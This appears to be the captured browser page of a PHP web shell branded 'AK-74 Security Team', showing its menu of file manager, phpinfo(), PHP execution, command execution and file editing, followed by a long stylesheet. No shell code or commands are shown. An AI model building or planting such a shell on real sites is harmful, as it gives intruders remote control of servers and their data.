.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
html, body { height: 100%; margin: 0; padding: 0; font-family: Helvetica, sans-serif, Arial; font-size: 13px; color: #333333; line-height: 18px; } h1, h2, h3, h4, h5, h6, p { margin-top: 0; } #header { margin: 0; padding: 0; position: fixed; background: #c33416; width: 100%; height: 38px; z-index: 11; border-bottom:1px solid #9e351f; } #header > #button-menu { width: auto; cursor: pointer; margin: 1px 0px 0px 6px; } #header a { cursor: pointer; } #header .nav li.dropdown { float: left; border-left: 1px solid #cccccc; } #header .nav li a.dropdown-toggle { color: #ffffff; } #header .nav li a.dropdown-toggle:hover { background:#333; } #header .nav li.open a.dropdown-toggle { color: #000000; } /* Menu */ #menu, #menu ul, #menu li { padding: 0; margin: 0; list-style: none; } #menu { margin-bottom: 50px; } #menu > li { position: relative; } #menu li a { text-decoration: none; display: block; padding: 10px; cursor: pointer; border-bottom:1px solid #96301b; } #menu li a i { font-size: 16px; } #menu > li > a { color: #ffffff; font-size: 14px; padding-left: 13px; border-bottom: 1px solid #9e351f; } #menu > li > a:hover { background-color: #333; } #menu > li > a > span { display: none; margin-left: 8px; } #menu li li a { color: #ffffff; } #menu li li a:hover { color: #dddddd; background-color: rgb(26, 21, 21); } #menu li li a:before { content: "\f101"; font-size: 14px; font-family: FontAwesome; margin-left: 10px; margin-right: 10px; } #menu li li a:hover:before { margin-right: 20px; } #menu > li.active > a { color: #dddddd; background-color:#333; } #menu li.active li a { color: #dddddd; } #menu li li.active > a:last-child { color: #ffffff; } #menu li li.active a:last-child:before { margin-left: 20px; margin-right: 10px; } #menu > li > ul { position: absolute; left: 50px; top: 0px; width: 240px; background-color: #9e351f; visibility: hidden; } #menu li ul { overflow: hidden; } #menu > li:hover > ul { visibility: visible; } #menu li li a.parent:after, #column-left.active #menu > li a.parent:after { font-family: FontAwesome; content: "\f105"; float: right; margin-right: 8px; } #menu li li.open > a.parent:after, #column-left.active #menu > li.open > a.parent:after { font-family: FontAwesome; content: "\f107"; float: right; margin-right: 8px; } #menu li ul a { padding-left: 20px; } #menu li li ul a { padding-left: 40px; } #menu li li li ul a { padding-left: 60px; } #menu li li li li ul a { padding-left: 80px; } #menu .collapse { visibility: inherit; } #menu .collapse.in { visibility: inherit; } /* Column Left */ #column-left { width: 50px; height: 100%; background-color: #c33416; position: fixed; top: 0px; margin-top: 38px; z-index: 10; transition: width 0.3s; } #column-left.active { width: 235px; display: block; } #content { min-height: 100%; padding-top: 40px; padding-bottom: 80px; } #column-left + #content { margin-left: 50px; } #column-left + #content + #footer { margin-left: 50px; } #column-left.active { width: 235px; overflow: auto; } #column-left.active #menu li i { font-size: 16px; width:16px; } #column-left.active #menu > li > a > span { display: inline; } #column-left.active #menu > li > ul { position: relative; left: auto; top: auto; width: auto; visibility: visible; } @media (max-width: 767px) { #column-left { overflow: hidden; display: none; } #column-left + #content { margin-left: 0; } #column-left + #content + #footer { margin-left: 0; } #column-left.active + #content { position: relative; left: 235px; } #column-left.active + #content + #footer { position: relative; left: 235px; } } @media (min-width: 768px) { #column-left.active + #content { margin-left: 235px; } #column-left.active + #content + #footer { margin-left: 235px; } } /* Breadcrumb */ .breadcrumb { border-radius: 0px; margin-bottom: 15px; margin-top: 5px; } .breadcrumb > li + li:before { content: "\f101"; font-family: FontAwesome; } /* Pagination */ .pagination { margin: 0px; } /* Panel */ .panel { border-radius: 0px; } .panel-heading { padding: 8px 15px; } .panel-title { font-size: 18px; color: #333333; padding: 5px 0; } /* Tabs */ .nav-tabs { margin-bottom: 25px; } /* Center Form */ .center-form { max-width: 420px; padding: 15px; margin: 0 auto; } .center-form .forgotten { font-weight: normal; margin-bottom: 0px; } .center-form .form-control { position: relative; font-size: 16px; height: auto; padding: 10px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .center-form button.btn { margin-top: 20px; } /* Form Group */ .form-group a { cursor: pointer; } /* Table */ .table a:hover { text-decoration: none; } .table a.asc:after { content: " \f0d8"; font-family: FontAwesome; font-size: 14px; } .table a.desc:after { content: " \f0d7"; font-family: FontAwesome; font-size: 14px; } .table td { vertical-align: middle !important; } /* Indent */ .indent-1 { padding-left: 20px !important; } .indent-2 { padding-left: 40px !important; } .indent-3 { padding-left: 60px !important; } label.control-label { font-weight: 600; font-size:14px; } /* Status */ .status { margin: 0px; } /* Required */ label.required:before { content: '* '; color: #ff0000; font-weight: bold; } /* Icons */ .fa-exclamation-circle.warning { color: #d9534f; } .fa-check-circle.success { color: #5cb85c; } /* Dashboard */ .dashboard-heading { margin: 20px 0; } .dashboard-stats > div.primary > .tile { background: #c33416; color: #ffffff; margin-bottom: 20px; } .dashboard-stats > div.primary > .tile > .heading { background: #9e351f; text-transform: uppercase; padding: 8px 8px; font-size: 16px; height: 32px; } .dashboard-stats > div.primary > .tile > .body { font-size: 30px; font-weight: bold; padding: 15px; line-height: 50px; } .dashboard-stats > div.primary > .tile > .footer { background: #9e351f; padding: 5px 10px; font-size:14px; } .dashboard-stats > div.alternate > .tile { background: #f9f9f9; color: #000000; margin-bottom: 20px; } .dashboard-stats > div.alternate > .tile > .heading { background: #eeeeee; text-transform: uppercase; padding: 8px 10px; } .dashboard-stats > div.alternate > .tile > .body { font-size: 40px; font-weight: bold; padding: 15px; line-height: 50px; } .dashboard-stats > div.alternate > .tile > .footer { background: #eeeeee; padding: 3px 10px; } .dashboard-stats > div.alternate > .tile > .footer a { color: #000000; } .dashboard-stats a { color: #ffffff; } /* Footer */ #footer { border-top: 1px solid #e5e5e5; background: #f5f5f5; text-align: center; color: #000000; padding-top: 15px; position: relative; font-weight: bold; } #loader { font-size: 24px; color: #fff; top: 300px; left: 45%; display: none; position: absolute; z-index: 99999999; width: 400px; height: 300px; } .loading { position: fixed; top: 50%; text-align: center; background: #222; padding: 15px; } .loading span { color: #4C7B00; } .loading-bar { display: inline-block; width: 4px; height: 18px; border-radius: 4px; animation: loading 1s ease-in-out infinite; } .loading-bar:nth-child(1) { background-color: #3498db; animation-delay: 0; } .loading-bar:nth-child(2) { background-color: #c0392b; animation-delay: 0.09s; } .loading-bar:nth-child(3) { background-color: #f1c40f; animation-delay: .18s; } .loading-bar:nth-child(4) { background-color: #27ae60; animation-delay: .27s; } @keyframes loading { 0% { transform: scale(1); } 20% { transform: scale(1, 2.2); } 40% { transform: scale(1); } } .width7 { width: 7%; } .img-thumbnail img { cursor: pointer; width: 100px; height: 100px; } .error { font-size: 12px; font-weight: bold; color: #FF0000; float: left; } .js .inputfile { width: 0.1px; height: 0.1px; opacity: 0; overflow: hidden; position: absolute; z-index: -1; } .inputfile + label figure { width: 100px; height: 100px; border-radius: 50%; background-color: #d3394c; display: block; padding: 20px; margin: 0 auto 10px; } .inputfile:focus + label figure, .inputfile.has-focus + label figure, .inputfile + label:hover figure { background-color: #722040; } .inputfile + label svg { width: 100%; height: 100%; fill: #f1e5e6; } .post-container { position: relative; width: auto; height: auto; padding: 0; margin: 0 0 30px; overflow: hidden; -webkit-box-shadow: 0 0 1px 1px #ddd; -moz-box-shadow: 0 0 1px 1px #ddd; -ms-box-shadow: 0 0 1px 1px #ddd; -o-box-shadow: 0 0 1px 1px #ddd; box-shadow: 0 0 1px 1px #ddd } .post-image { background-color: #fff; padding: 15px } .post-desc { border-top: 1px solid #ddd; padding: 15px; background-color: #fff; font-size: 14px } .box > .icon { text-align: center; position: relative; } .box > .icon > .image { position: relative; z-index: 2; margin: auto; width: 48px; height: 48px; line-height: 55px; border-radius: 50%; background: #C0392B; vertical-align: middle; } .box > .icon:hover > .image { background: #333; } .box > .icon > .image > i, .box > .icon > .image > span { font-size: 26px !important; color: #fff !important; } .box > .icon:hover > .image > i, .box > .icon:hover > .image > span { color: white !important; } .box > .icon > .info { margin-top: -24px; background: rgba(0, 0, 0, 0.04); border: 1px solid #e0e0e0; padding: 15px 0 10px 0; } .box > .icon> .info { height: 70px } .box > .icon:hover > .info { background: rgba(0, 0, 0, 0.04); border-color: #e0e0e0; color: white; } .box > .icon > .info > h3.title { font-family: "Roboto", sans-serif !important; font-size: 16px; color: #222; font-weight: 500; margin-top: 15px; margin-bottom: 0px; } .box > .icon > .info > p { font-family: "Roboto", sans-serif !important; font-size: 13px; color: #666; line-height: 1.5em; margin: 20px; } .box > .icon:hover > .info > h3.title, .box > .icon:hover > .info > p, .box > .icon:hover > .info > .more > a { color: #222; } .box > .icon > .info > .more a { font-family: "Roboto", sans-serif !important; font-size: 12px; color: #222; line-height: 12px; text-transform: uppercase; text-decoration: none; } .box > .icon:hover > .info > .more > a { color: #fff; padding: 6px 8px; background-color: #63B76C; } .box .space { height: 20px; } .pagination > li > a, .pagination > li > span { border-radius: 50% !important; margin: 0 5px; } .upload_img { padding: 7px 0; } input.image, .cover { width: 325px; display: inline-block; background: white; padding: 5px 0px; border: 1px solid #ccc; border-radius: 3px; text-indent: -100px; outline: 0 !important; cursor: pointer; } span.custom_span { padding: 3px 8px; font-size: 12px; text-shadow: none; margin-top: -2px; margin-left: 10px; } span.remove { margin-left: 7px; margin-left: 17px; } .post-container { position: relative; width: auto; height: auto; padding: 0; margin: 0 0 30px; overflow: hidden; -webkit-box-shadow: 0 0 1px 1px #ddd; -moz-box-shadow: 0 0 1px 1px #ddd; -ms-box-shadow: 0 0 1px 1px #ddd; -o-box-shadow: 0 0 1px 1px #ddd; box-shadow: 0 0 1px 1px #ddd } .post-image { background-color: #fff; padding: 10px } .post-desc { text-align: center; padding: 10px; } #preloader { position: fixed; z-index: 999999; top: 0; right: 0; bottom: 0; left: 0; background-color: rgba(225, 102, 0, 0.48); display: none; } #preloader-status { position: absolute; top: 50%; left: 50%; width: 200px; height: 200px; margin: -100px 0 0 -100px; } #preloader-title { text-align: center; } .spinner { margin: 0px 0px 15px 75px; width: 120px; height: 30px; text-align: center; font-size: 10px; } .spinner > div { background-color: #337ab7; height: 100%; width: 20px; display: inline-block; -webkit-animation: stretchdelay 1.2s infinite ease-in-out; animation: stretchdelay 1.2s infinite ease-in-out; } .spinner .rect2 { background: #16960A; -webkit-animation-delay: -1.1s; animation-delay: -1.1s; } .spinner .rect3 { -webkit-animation-delay: -1s; animation-delay: -1s; } .spinner .rect4 { background: #419A1C; -webkit-animation-delay: -0.9s; animation-delay: -0.9s; } .spinner .rect5 { -webkit-animation-delay: -0.8s; animation-delay: -0.8s; } @-webkit-keyframes stretchdelay { 0%, 40%, 100% { -webkit-transform: scaleY(0.4); } 20% { -webkit-transform: scaleY(1); } } @keyframes stretchdelay { 0%, 40%, 100% { transform: scaleY(0.4); -webkit-transform: scaleY(0.4); } 20% { transform: scaleY(1); -webkit-transform: scaleY(1); } } .back-to-top { cursor: pointer; position: fixed; bottom: 10px; right: 5px; display: none; padding: 10px; font-size: 14px; background: #286090; border: 1px solid #286090; } .product { padding: 10px; margin-bottom: 15px; border: 1px solid #E5E5E5; display: -webkit-box; display: -ms-flexbox; display: flex; -webkit-box-orient: vertical; -webkit-box-direction: normal; -ms-flex-direction: column; flex-direction: column; box-shadow: 0 2px 55px rgba(0,0,0,0.1); } .middle { margin-bottom: 30px; } .middle img { height: 170px; } .product-details { text-align: center; display: flex; -webkit-box-orient: vertical; -webkit-box-direction: normal; flex-direction: column; -webkit-box-pack: justify; justify-content: space-between; -webkit-box-flex: 1; flex-grow: 1; } .product-name { font-size: 14px; margin-bottom: 10px; letter-spacing: 0; } .product-id { font-size: 12px; color: #969696; margin-bottom: 10px; } .product-brand { font-size: 14px; margin-bottom: 10px; } .product-price, .product-in-stock { color: #ff9933; } .product-out-of-stock { color: red; } .preview { background: #eee; padding: 2em; line-height: 1.5em; } .product-title, .price{ font-weight: bold; } .product-table-heading{ font-size:15px; font-weight:600; padding:16px; } .product-table-answer{ font-size:14px; font-weight:600; color:#337ab7; } .preview .table{ width:500px; } .checked, .price span { color:#ff9933; } .pid{ font-weight:600; } .product-title, .pid, .product-description, .price{ margin-bottom: 15px; } .label-error { color:blue; } .check label{ margin:10px 32px 0px 6px } .img-box{ border:1px solid #E7E7E7; padding:10px; } .img-box img{ height:125px; width:130px; } .rashi{ background: #E7E7E7; color: #c33416; font-size: 16px; text-align: center; padding: 12px; margin-bottom:20px; }
Rename:
-